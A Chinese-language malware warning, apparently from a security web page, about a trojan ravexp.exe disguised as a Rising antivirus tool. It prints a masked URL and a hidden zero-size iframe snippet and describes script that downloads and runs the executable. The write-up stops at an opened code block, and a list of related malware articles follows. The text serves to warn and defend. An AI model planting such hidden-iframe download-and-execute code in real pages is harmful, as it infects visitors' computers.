小心冒充瑞星专家的病毒ravexp.exe

简介: 小心冒充瑞星专家的病毒ravexp.exe

打开URL:

/------
hxxp://www.%6E%6A***%74%73%69***%73.com/images/ravexpert.jpg
------/

你会看到一张图片,其实这个URL指向的是一个网页,包含代码:

/------
<IFRAME align=center name="target" frameBorder=0 height=0 scrolling=no src="hxxp://www.n**j**tsi**s.com/n**j**s**ex/vip**_reg*.htm"width=0></IFRAME>
------/

vip*_reg**.htm  包含双重加密的脚本代码,第一重是escape()加密的JavaScript代码,第二重是自定义函数rechange(t)加密的VBScript代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 ravexp.exe,并利用Shell.Application 对象MircoLonge 的 ShellExecute 方法 来运行。

ravexp.exe 采用PESHiELD 0.1b MTE -> ANAKiN加壳,不仅使用类似瑞星的金狮子头作为图标,而且版本信息是伪造瑞星的:

/------


相关文章
|
9月前
|
云安全 安全 网络协议
安全研究所 | 伪装搜狗输入法的木马分析
近年来,黑灰产业的犯罪团伙数量急剧上升,特别是在与办公软件相关领域。这些团伙主要针对国内企业用户,通过伪装成合法的办公软件进行精心设计的诈骗和诱导行为,其主要目的是欺骗企业员工下载并激活木马病毒,以此来窃取公司资金或获取企业敏感文件。
|
5月前
|
开发框架 Java .NET
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
|
5月前
|
安全 JavaScript 前端开发
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
|
5月前
|
安全
[2006-04-12]一个下载传奇盗号木马的网站(第2版)
[2006-04-12]一个下载传奇盗号木马的网站(第2版)
|
Web App开发 安全
卡巴斯基提醒网民注意:压缩文件也能变木马
普通计算机用户一般都通过所下载文件的图标来判断文件类型,但这一方法并非绝对安全。很多病毒会修改自身的显示图标,伪装成正常文件,诱使用户点击运行。卡巴斯基实验室近期就检测到一种名为“首页修改大师”的木马(Trojan-Dropper.Win32.StartPage.cr),这种木马采用WINRAR压缩工具的图标迷惑用户,其实本身是一个exe可执行文件,一旦计算机用户不小心运行了该文件,系统就会被感染。
1130 0
|
安全
Windows10被曝漏洞,受害者电脑沦为“肉鸡”
一旦被攻击者利用,电脑里的任何应用都可能拥有系统权限,攻击者可以执行危害级别更高的恶意行为,受害者电脑沦为“肉鸡”。
451 0
|
安全 Windows 网络安全
威胁快报|Bulehero挖矿蠕虫升级,PhpStudy后门漏洞加入武器库
近日,阿里云安全团队监控到Bulehero挖矿蠕虫进行了版本升级,蠕虫升级后开始利用最新出现的PHPStudy后门漏洞作为新的攻击方式对Windows主机进行攻击,攻击成功后会下载门罗币挖矿程序进行牟利。建议用户及时排查自身主机是否存在安全漏洞,并关注阿里云安全团队的相关文章。
3327 0
|
安全
谨防沦为DLL后门木马及其变种的肉鸡
卡巴斯基实验室近期发现有一种名为“DLL后门木马”的恶意软件活动比较频繁。 该木马采用Delphi语言编写,未加壳,但其具有伪造的数字签名,而且其变种竟然高达390多种。此木马主要通过网页挂马等方式感染用户计算机,危害性比较大。
941 0
|
云安全 安全
瑞星杀毒网络版2010发布 称可查杀99.9%木马
4月15日,亚洲最大的信息安全厂商瑞星公司召开隆重发布会,正式发布2010年企业级旗舰产品——“瑞星杀毒软件网络版2010”系列。该系列产品包括六种版本,产品适用范围覆盖了小型企业、大中型企业、金融机构以及政府单位等所有企业级用户。
1147 0